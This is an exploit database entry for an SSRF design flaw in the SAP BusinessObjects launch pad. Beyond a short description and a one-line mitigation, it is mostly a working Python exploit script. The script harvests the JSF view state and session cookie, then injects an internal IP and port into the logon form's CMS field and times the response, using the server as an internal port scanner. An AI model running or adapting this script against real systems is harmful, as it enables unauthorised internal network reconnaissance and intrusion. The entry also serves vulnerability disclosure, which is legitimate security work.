SAP BusinessObjects launch pad SSRF

vendor:

BusinessObjects

by:

Ahmad Mahfouz

8,8

CVSS

HIGH

SSRF

918

CWE

Product Name: BusinessObjects

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2017

SAP BusinessObjects launch pad SSRF

Design Error in SAP BusinessObjects launch pad leads to SSRF attack. An attacker can use this vulnerability to scan internal networks and access sensitive information.

Mitigation:

Ensure that the application is not vulnerable to SSRF attacks by validating user input and restricting access to internal networks.

Source

Exploit-DB raw data:

# Exploit Title: SAP BusinessObjects launch pad SSRF
# Date: 2017-11-8
# Exploit Author: Ahmad Mahfouz
# Category: Webapps
# Author Homepage: www.unixawy.com
# Description: Design Error in SAP BusinessObjects launch pad leads to SSRF attack 

 
#!/usr/bin/env python
# SAP BusinessObjects launch pad SSRF Timing Attack Port scan
# usage : sblpta.py http://path.faces targetIP targetPort
import urllib2
import urllib
import ssl
from datetime import datetime
import sys

 

if len(sys.argv) != 4:

   print "Usage: python sblpta.py http://path.faces targetIP targetPort"
   sys.exit(1)

url = sys.argv[1]
targetIP = sys.argv[2]
targetPort = sys.argv[3]
targetHostIP = "%s:%s" %(targetIP,targetPort)
print "\r\n" 
print "[*] SAP BusinessObjects Timing Attack"
headers = {'User-Agent': 'Mozilla/5.0'}
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)

try:

   request = urllib2.Request(url, headers=headers)
   page = urllib2.urlopen(request, context=gcontext)
   print "[*] Connected to SAP Bussiness Object %s"  %url

except:

   print "[-] Failed To connect to SAP Bussiness Object %s" %url
   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
   sys.exit(2)

 
resheaders = page.info()
cookie = resheaders.dict['set-cookie']
content = page.readlines()

for line in content:

   if "com.sun.faces.VIEW" in line:
      sfview = line.split("=")[4].split("\"")[1]
      print "[*] Got java faces dynamic value"

   else:
      continue

if not sfview:

   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
   sys.exit(3)


formdata = {"_id0:logon:CMS":targetHostIP,
         "_id0:logon:USERNAME":"",
         "_id0:logon:PASSWORD":"",
         "com.sun.faces.VIEW":sfview,
         "_id0":"_id0"
         }

 

data_encode = urllib.urlencode(formdata)
start =  datetime.now()
print "[*] Testing Timing Attack %s" %start        
request = urllib2.Request(url,data_encode)
request.add_header('Cookie', cookie)
response  = urllib2.urlopen(request)
end = datetime.now()
the_page = response.read()


if "FWM" in the_page:
 
   elapsedTime = end-start
   if elapsedTime.total_seconds() >= 10:

      print "[*] Port %s is Open, Gotcha !!! " %targetPort

   else:

      print "[*] Port %s is Closed , we die fast"  %targetPort

elif "FWC" in the_page:

   print "[-] error login expired"
   sys.exit(10)